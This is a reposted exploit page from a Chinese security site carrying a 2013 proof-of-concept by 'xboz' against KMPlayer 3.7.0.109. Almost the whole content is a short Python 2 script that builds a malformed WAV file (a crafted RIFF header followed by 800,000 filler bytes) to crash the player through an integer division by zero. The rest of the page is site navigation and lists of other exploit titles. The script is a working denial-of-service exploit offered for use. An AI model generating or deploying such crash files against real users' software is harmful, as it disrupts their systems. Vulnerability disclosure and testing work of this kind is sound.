首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KMPlayer 3.7.0.109 (.wav) - Crash PoC
来源:vfocus.net 作者:xboz 发布时间:2013-10-09  
# Exploit Title: KMPlayer 3.7.0.109 Integer division by zero DoS.
# Date: 29-9-2013
# Exploit Author: xboz
# Vendor Homepage: http://www.kmpmedia.net/
# Version: 3.7.0.109
# Tested on: Windows 7,8
   
header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
"\x5a\x00\x2f\x00\x67\x00\x0a")
 exploit = header
exploit += "\x41" * 800000
    
try:
    print "[+] Creating POC"
    crash = open('fuzz.wav','w');
    crash.write(exploit);
    crash.close();
except:
    print "[-] No Permissions.."

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·glibc and eglibc 2.5, 2.7, 2.1
·Microsoft Internet Explorer Se
·HP LoadRunner magentproc.exe O
·Firefox For Android Same-Origi
·GestioIP Remote Command Execut
·PinApp Mail-SeCure Access Cont
·ClipBucket Remote Code Executi
·Abuse HTTP Server 2.8 Denial O
·FlashChat Arbitrary File Uploa
·davfs2 1.4.6/1.4.7 - Local Pri
·Apple Motion 5.0.7 Integer Ove
·Internet Haut Debit Mobile Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved